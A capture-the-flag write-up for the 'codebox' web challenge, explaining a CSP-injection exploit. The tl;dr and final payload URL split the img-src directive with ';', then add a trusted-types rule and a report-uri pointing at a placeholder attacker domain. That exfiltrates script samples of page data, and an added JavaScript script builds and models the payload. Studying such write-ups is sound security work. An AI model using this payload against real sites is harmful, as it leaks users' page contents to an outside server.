Tags: web 

Rating:

# tl;dr
* use `<img src="...">` to inject into the CSP: the server copies each `img src` value into its `img-src` directive, so a `;` inside the value terminates that directive and lets you append directives of your own
* use `report-uri your-domain` to have the browser POST CSP violation reports to a server you control
* use `require-trusted-types-for 'script'` so the front end's `innerHTML` assignment becomes a violation; the report's `script-sample` field carries the beginning of the value that was written to the sink
* use `code=&code=<payload>` so the front end, which reads only the first `code` value, sees an empty (falsy) `code`, while the server still parses the second one

Final Payload (`+` is a URL-encoded space): `https://codebox.mc.ax/?code=&code=<img+src="*;+require-trusted-types-for+'script'+;+report-uri+https://your.domain.com/"+>`
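To see how the pieces of that payload fit together, here is an added JavaScript example (mine, not code from the original writeup or from the challenge). It builds the URL from its parts, shows what the front end reads versus what the server parses, and splits the resulting header into directives the way a browser does. The server model is an assumption reconstructed from the tl;dr (a baseline policy plus an `img-src` directive filled with every `<img src>` value found in every `code` parameter); `https://your.domain.com/` is a placeholder for your own report collector, and the regex stands in for the real server's HTML parser.

```javascript
// Added example (not part of the original writeup or the challenge source).
// Models the codebox CSP injection offline so each step of the payload can
// be inspected. ASSUMPTIONS: the server behaviour below is reconstructed
// from the tl;dr (every `code` value is scanned for <img src>, each src is
// concatenated into an img-src directive); the real server uses a full HTML
// parser, which the regex here only approximates.

const BASE_URL = 'https://codebox.mc.ax/';
const REPORT_URI = 'https://your.domain.com/'; // placeholder for your collector

// The "src" value that ends up in the header: `*` keeps img-src valid,
// `;` ends that directive, and the remainder is read as two new directives.
function injectedImgSrc(reportUri) {
  return `*; require-trusted-types-for 'script' ; report-uri ${reportUri}`;
}

// Two `code` parameters: the first (empty) is what the front end reads,
// the second carries the <img> that the server turns into CSP.
function buildPayloadUrl(reportUri = REPORT_URI) {
  const url = new URL(BASE_URL);
  url.searchParams.append('code', '');
  url.searchParams.append('code', `<img src="${injectedImgSrc(reportUri)}" >`);
  return url.toString();
}

// Front end: URLSearchParams.get() returns only the FIRST value, here ''.
// That is falsy, which is the state the writeup wants the front end in.
function frontEndCode(url) {
  return new URL(url).searchParams.get('code');
}

// Server model: all `code` values are considered and every <img src> is
// copied verbatim into img-src. The `;` inside the src is never stripped,
// which is the whole injection.
function serverCspHeader(url) {
  const images = [];
  for (const code of new URL(url).searchParams.getAll('code')) {
    for (const m of code.matchAll(/<img\b[^>]*\bsrc="([^"]*)"/gi)) {
      images.push(m[1]);
    }
  }
  const csp = ["default-src 'none'", "script-src 'unsafe-inline'"]; // assumed baseline
  if (images.length) csp.push(`img-src ${images.join(' ')}`);
  return csp.join('; ');
}

// Browser-style CSP parsing: directives are separated by ';', each is a
// name followed by whitespace-separated values; a repeated name is ignored.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// Everything worth checking about the payload in one place.
function analysePayload(reportUri = REPORT_URI) {
  const url = buildPayloadUrl(reportUri);
  return {
    url,
    frontEndCode: frontEndCode(url),
    directives: parseCsp(serverCspHeader(url)),
  };
}

const result = analysePayload();
console.log(result.url);
console.log(JSON.stringify(result.directives, null, 2));
```

Run it with `node` and compare the printed directives with the header your own collector receives alongside the report: if `require-trusted-types-for` and `report-uri` show up as separate keys, the `;` survived the server's concatenation and the injection is live.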

[Original writeup](https://lu513n.com/blog/posts/codebox/)